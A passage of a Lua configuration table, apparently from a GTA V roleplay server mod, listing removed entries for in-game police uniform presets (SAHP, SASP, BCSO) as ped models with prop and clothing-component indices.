2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 168, 12 }, - { 3, 34, 1 }, - { 10, 1, 1 }, - { 8, 73, 6 }, - { 4, 11, 1 }, - { 6, 26, 1 }, - { 7, 21, 4 }, - { 9, 24, 3 }, - { 5, 67, 1 }, - } - }, - ['Female SAHP Inspector Winter'] = { - category = 'SAHP', - ped = 'mp_f_freemode_01', - props = { - { 0, 6, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 165, 12 }, - { 3, 45, 2 }, - { 10, 1, 1 }, - { 8, 40, 14 }, - { 4, 4, 5 }, - { 6, 26, 1 }, - { 7, 1, 1 }, - { 9, 26, 3 }, - { 5, 67, 1 }, - } - }, - ['Male SAHP Task Force'] = { - category = 'SAHP', - ped = 'mp_m_freemode_01', - props = { - { 0, 45, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 122, 1 }, - { 11, 52, 2 }, - { 3, 31, 1 }, - { 10, 1, 1 }, - { 8, 115, 3 }, - { 4, 1, 1 }, - { 6, 64, 5 }, - { 7, 2, 1 }, - { 9, 8, 4 }, - { 5, 1, 1 }, - } - }, - ['Female SAHP Task Force'] = { - category = 'SAHP', - ped = 'mp_f_freemode_01', - props = { - { 0, 44, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 122, 1 }, - { 11, 104, 1 }, - { 3, 19, 1 }, - { 10, 1, 1 }, - { 8, 82, 3 }, - { 4, 52, 3 }, - { 6, 37, 1 }, - { 7, 2, 1 }, - { 9, 8, 5 }, - { 5, 67, 1 }, - } - }, - ['Male SAHP Riot Gear'] = { - category = 'SAHP', - ped = 'mp_m_freemode_01', - props = { - { 0, 126, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 33, 1 }, - { 3, 32, 1 }, - { 10, 1, 1 }, - { 8, 54, 1 }, - { 4, 87, 13 }, - { 6, 55, 1 }, - { 7, 9, 1 }, - { 9, 13, 1 }, - { 5, 49, 1 }, - } - }, - ['Female SAHP Riot Gear'] = { - category = 'SAHP', - ped = 'mp_f_freemode_01', - props = { - { 0, 125, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 32, 1 }, - { 3, 40, 1 }, - { 10, 1, 1 }, - { 8, 28, 2 }, - { 4, 90, 13 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 12, 1 }, - { 5, 49, 1 }, - } - }, - ['Male SAHP SWAT Uniform'] = { - category = 'SAHP', - ped = 'mp_m_freemode_01', - props = { - { 0, 40, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 54, 2 }, - { 3, 17, 1 }, - { 10, 10, 1 }, - { 8, 16, 1 }, - { 4, 38, 2 }, - { 6, 26, 1 }, - { 7, 111, 1 }, - { 9, 28, 3 }, - { 5, 49, 1 }, - } - }, - ['Female SAHP SWAT Uniform'] = { - category = 'SAHP', - ped = 'mp_f_freemode_01', - props = { - { 0, 39, 2 }, - { 1, 26, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 47, 2 }, - { 3, 18, 1 }, - { 10, 9, 1 }, - { 8, 16, 1 }, - { 4, 37, 2 }, - { 6, 26, 1 }, - { 7, 82, 1 }, - { 9, 30, 3 }, - { 5, 49, 1 }, - } - }, - ['Male SAHP Pilot Uniform'] = { - category = 'SAHP', - ped = 'mp_m_freemode_01', - props = { - { 0, 80, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 66, 4 }, - { 3, 97, 1 }, - { 10, 9, 3 }, - { 8, 44, 1 }, - { 4, 39, 4 }, - { 6, 25, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female SAHP Pilot Uniform'] = { - category = 'SAHP', - ped = 'mp_f_freemode_01', - props = { - { 0, 79, 1 }, - { 1, 14, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 60, 4 }, - { 3, 37, 1 }, - { 10, 8, 3 }, - { 8, 31, 1 }, - { 4, 39, 4 }, - { 6, 25, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Male SASP Ranger Class A'] = { - category = 'SASP', - ped = 'mp_m_freemode_01', - props = { - { 0, 5, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 201, 6 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 50, 2 }, - { 4, 87, 9 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 37, 1 }, - } - }, - ['Male SASP Ranger Class B'] = { - category = 'SASP', - ped = 'mp_m_freemode_01', - props = { - { 0, 5, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 194, 6 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 50, 2 }, - { 4, 87, 9 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 14, 1 }, - { 5, 37, 1 }, - } - }, - ['Male SASP Ranger Class C'] = { - category = 'SASP', - ped = 'mp_m_freemode_01', - props = { - { 0, 11, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 191, 6 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 50, 2 }, - { 4, 87, 9 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 14, 1 }, - { 5, 37, 1 }, - } - }, - ['Male SASP Lifeguard Class A'] = { - category = 'SASP', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 201, 7 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 50, 2 }, - { 4, 87, 13 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 37, 1 }, - } - }, - ['Male SASP Lifeguard Class B'] = { - category = 'SASP', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 194, 7 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 50, 2 }, - { 4, 87, 13 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 14, 1 }, - { 5, 37, 1 }, - } - }, - ['Male SASP Lifeguard Class C'] = { - category = 'SASP', - ped = 'mp_m_freemode_01', - props = { - { 0, 11, 4 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 191, 7 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 50, 2 }, - { 4, 87, 13 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 14, 1 }, - { 5, 37, 1 }, - } - }, - ['Female SASP Ranger Class A'] = { - category = 'SASP', - ped = 'mp_f_freemode_01', - props = { - { 0, 5, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 203, 6 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 32, 1 }, - { 4, 90, 9 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 15, 1 }, - { 5, 37, 1 }, - } - }, - ['Female SASP Ranger Class B'] = { - category = 'SASP', - ped = 'mp_f_freemode_01', - props = { - { 0, 11, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 196, 6 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 32, 1 }, - { 4, 90, 9 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 15, 1 }, - { 5, 37, 1 }, - } - }, - ['Female SASP Ranger Class C'] = { - category = 'SASP', - ped = 'mp_f_freemode_01', - props = { - { 0, 11, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 193, 6 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 32, 1 }, - { 4, 90, 9 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 15, 1 }, - { 5, 37, 1 }, - } - }, - ['Female SASP Lifeguard Class A'] = { - category = 'SASP', - ped = 'mp_f_freemode_01', - props = { - { 0, 5, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 203, 7 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 32, 1 }, - { 4, 90, 13 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 15, 1 }, - { 5, 37, 1 }, - } - }, - ['Female SASP Lifeguard Class B'] = { - category = 'SASP', - ped = 'mp_f_freemode_01', - props = { - { 0, 11, 7 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 196, 7 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 32, 1 }, - { 4, 90, 13 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 15, 1 }, - { 5, 37, 1 }, - } - }, - ['Female SASP Lifeguard Class C'] = { - category = 'SASP', - ped = 'mp_f_freemode_01', - props = { - { 0, 11, 7 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 193, 7 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 32, 1 }, - { 4, 90, 13 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 15, 1 }, - { 5, 37, 1 }, - } - }, - ['Male SASP Jacket'] = { - category = 'SASP', - ped = 'mp_m_freemode_01', - props = { - { 0, 11, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 157, 2 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 66, 4 }, - { 4, 87, 9 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 2, 3 }, - { 5, 49, 1 }, - } - }, - ['Female SASP Jacket'] = { - category = 'SASP', - ped = 'mp_f_freemode_01', - props = { - { 0, 11, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 154, 2 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 46, 4 }, - { 4, 90, 9 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 2, 3 }, - { 5, 49, 1 }, - } - }, - ['Male SASP Ranger Winter Uniform'] = { - category = 'SASP', - ped = 'mp_m_freemode_01', - props = { - { 0, 9, 4 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 18, 5 }, - { 3, 39, 1 }, - { 10, 1, 1 }, - { 8, 50, 2 }, - { 4, 87, 9 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 27, 4 }, - { 5, 49, 1 }, - } - }, - ['Female SASP Ranger Winter Uniform'] = { - category = 'SASP', - ped = 'mp_f_freemode_01', - props = { - { 0, 9, 4 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 22, 5 }, - { 3, 37, 1 }, - { 10, 1, 1 }, - { 8, 32, 1 }, - { 4, 90, 9 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 29, 4 }, - { 5, 49, 1 }, - } - }, - ['Male SASP Lifeguard Winter Uniform'] = { - category = 'SASP', - ped = 'mp_m_freemode_01', - props = { - { 0, 3, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 18, 6 }, - { 3, 39, 1 }, - { 10, 1, 1 }, - { 8, 50, 2 }, - { 4, 87, 13 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 27, 5 }, - { 5, 49, 1 }, - } - }, - ['Female SASP Lifeguard Winter Uniform'] = { - category = 'SASP', - ped = 'mp_f_freemode_01', - props = { - { 0, 6, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 22, 6 }, - { 3, 37, 1 }, - { 10, 1, 1 }, - { 8, 32, 1 }, - { 4, 90, 13 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 29, 5 }, - { 5, 49, 1 }, - } - }, - ['Male BCSO Uniform Class A'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 14, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 201, 4 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 39, 1 }, - { 4, 26, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 55, 1 }, - } - }, - ['Male BCSO Uniform Class B'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 194, 4 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 39, 1 }, - { 4, 26, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 14, 1 }, - { 5, 55, 1 }, - } - }, - ['Male BCSO Uniform Class C'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 191, 4 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 39, 1 }, - { 4, 26, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 14, 1 }, - { 5, 55, 1 }, - } - }, - ['Female BCSO Class A'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 14, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 203, 4 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 52, 1 }, - { 4, 42, 2 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 55, 1 }, - } - }, - ['Female BCSO Class B'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 196, 4 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 52, 1 }, - { 4, 42, 2 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 55, 1 }, - } - }, - ['Female BCSO Class C'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 193, 4 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 52, 1 }, - { 4, 42, 2 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 55, 1 }, - } - }, - ['Male BCSO Jacket HI-VIS'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 157, 1 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 66, 2 }, - { 4, 26, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 3, 2 }, - { 5, 49, 1 }, - } - }, - ['Male BCSO Jacket'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 157, 4 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 66, 2 }, - { 4, 26, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 3, 2 }, - { 5, 49, 1 }, - } - }, - ['Female BCSO Jacket'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 154, 4 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 46, 2 }, - { 4, 42, 2 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 3, 2 }, - { 5, 49, 1 }, - } - }, - ['Male BCSO Winter Uniform'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 9, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 18, 3 }, - { 3, 39, 1 }, - { 10, 1, 1 }, - { 8, 45, 1 }, - { 4, 26, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 27, 2 }, - { 5, 49, 1 }, - } - }, - ['Female BCSO Winter Uniform'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 9, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 22, 3 }, - { 3, 37, 1 }, - { 10, 1, 1 }, - { 8, 52, 1 }, - { 4, 42, 2 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 29, 2 }, - { 5, 49, 1 }, - } - }, - ['Male BCSO Raincoat'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 11, 8 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 190, 8 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 66, 2 }, - { 4, 26, 1 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 35, 1 }, - { 5, 55, 1 }, - } - }, - ['Female BCSO Raincoat'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 11, 8 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 192, 8 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 46, 2 }, - { 4, 42, 2 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 39, 1 }, - { 5, 1, 1 }, - } - }, - ['Male BCSO Motorcycle Class A'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 18, 4 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 201, 4 }, - { 3, 21, 1 }, - { 10, 1, 1 }, - { 8, 39, 1 }, - { 4, 33, 3 }, - { 6, 14, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 55, 1 }, - } - }, - ['Male BCSO Motorcycle Class B'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 18, 4 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 194, 4 }, - { 3, 21, 1 }, - { 10, 1, 1 }, - { 8, 39, 1 }, - { 4, 33, 3 }, - { 6, 14, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 55, 1 }, - } - }, - ['Male BCSO Motorcycle Class C'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 18, 4 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 191, 4 }, - { 3, 20, 1 }, - { 10, 1, 1 }, - { 8, 39, 1 }, - { 4, 33, 3 }, - { 6, 14, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 55, 1 }, - } - }, - ['Female BCSO Motorcycle Class A'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 18, 4 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 203, 4 }, - { 3, 24, 1 }, - { 10, 1, 1 }, - { 8, 52, 1 }, - { 4, 32, 3 }, - { 6, 10, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 55, 1 }, - } - }, - ['Female BCSO Motorcycle Class B'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 18, 4 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 196, 4 }, - { 3, 24, 1 }, - { 10, 1, 1 }, - { 8, 52, 1 }, - { 4, 32, 3 }, - { 6, 10, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 55, 1 }, - } - }, - ['Female BCSO Motorcycle Class C'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 18, 4 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 193, 4 }, - { 3, 32, 1 }, - { 10, 1, 1 }, - { 8, 52, 1 }, - { 4, 32, 3 }, - { 6, 10, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 55, 1 }, - } - }, - ['Male BCSO Bicycle Uniform'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 50, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 95, 2 }, - { 3, 20, 1 }, - { 10, 1, 1 }, - { 8, 38, 1 }, - { 4, 13, 2 }, - { 6, 3, 1 }, - { 7, 9, 1 }, - { 9, 15, 1 }, - { 5, 49, 1 }, - } - }, - ['Female BCSO Bicycle Uniform'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 48, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 86, 2 }, - { 3, 32, 1 }, - { 10, 1, 1 }, - { 8, 3, 1 }, - { 4, 15, 4 }, - { 6, 11, 1 }, - { 7, 9, 1 }, - { 9, 2, 1 }, - { 5, 49, 1 }, - } - }, - ['Male BCSO Harbor Patrol'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 16, 10 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 95, 2 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 89, 1 }, - { 4, 88, 8 }, - { 6, 25, 1 }, - { 7, 2, 1 }, - { 9, 26, 1 }, - { 5, 49, 1 }, - } - }, - ['Female BCSO Harbor Patrol'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 26, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 86, 2 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 66, 1 }, - { 4, 91, 8 }, - { 6, 25, 1 }, - { 7, 9, 1 }, - { 9, 28, 1 }, - { 5, 49, 1 }, - } - }, - ['Male BCSO Suit'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 5, 2 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 12, 1 }, - { 4, 11, 4 }, - { 6, 11, 1 }, - { 7, 13, 9 }, - { 9, 24, 1 }, - { 5, 67, 1 }, - } - }, - ['Female BCSO Suit'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 25, 3 }, - { 3, 8, 1 }, - { 10, 1, 1 }, - { 8, 65, 2 }, - { 4, 4, 9 }, - { 6, 30, 1 }, - { 7, 1, 1 }, - { 9, 26, 1 }, - { 5, 1, 1 }, - } - }, - ['Male BCSO Detective'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 4, 1 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 81, 9 }, - { 4, 11, 4 }, - { 6, 11, 1 }, - { 7, 7, 1 }, - { 9, 24, 1 }, - { 5, 1, 1 }, - } - }, - ['Male BCSO Detective (Vest)'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 4, 1 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 132, 3 }, - { 4, 11, 4 }, - { 6, 11, 1 }, - { 7, 7, 1 }, - { 9, 24, 1 }, - { 5, 1, 1 }, - } - }, - ['Female BCSO Detective'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 15, 16 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 8, 1 }, - { 4, 4, 6 }, - { 6, 30, 1 }, - { 7, 7, 1 }, - { 9, 26, 1 }, - { 5, 1, 1 }, - } - }, - ['Male BCSO Windbreaker'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 37, 5 }, - { 3, 7, 1 }, - { 10, 1, 1 }, - { 8, 12, 1 }, - { 4, 11, 4 }, - { 6, 11, 1 }, - { 7, 7, 1 }, - { 9, 6, 1 }, - { 5, 61, 1 }, - } - }, - ['Female BCSO Windbreaker'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 169, 5 }, - { 3, 8, 1 }, - { 10, 1, 1 }, - { 8, 40, 4 }, - { 4, 4, 9 }, - { 6, 30, 1 }, - { 7, 7, 1 }, - { 9, 26, 1 }, - { 5, 1, 1 }, - } - }, - ['Male BCSO Detective Winter'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 3, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 168, 8 }, - { 3, 39, 1 }, - { 10, 1, 1 }, - { 8, 12, 1 }, - { 4, 11, 4 }, - { 6, 72, 2 }, - { 7, 21, 1 }, - { 9, 24, 1 }, - { 5, 67, 1 }, - } - }, - ['Female BCSO Detective Winter'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 6, 5 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 165, 8 }, - { 3, 45, 1 }, - { 10, 1, 1 }, - { 8, 68, 6 }, - { 4, 4, 6 }, - { 6, 26, 1 }, - { 7, 1, 1 }, - { 9, 22, 1 }, - { 5, 67, 1 }, - } - }, - ['Male BCSO Task Force'] = { - category = 'BCSO', - ped = 'mp_m_freemode_01', - props = { - { 0, 11, 8 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 122, 1 }, - { 11, 74, 19 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 116, 1 }, - { 4, 1, 1 }, - { 6, 52, 1 }, - { 7, 120, 2 }, - { 9, 8, 2 }, - { 5, 67, 2 }, - } - }, - ['Female BCSO Task Force'] = { - category = 'BCSO', - ped = 'mp_f_freemode_01', - props = { - { 0, 11, 8 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 122, 1 }, - { 11, 224, 1 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 82, 1 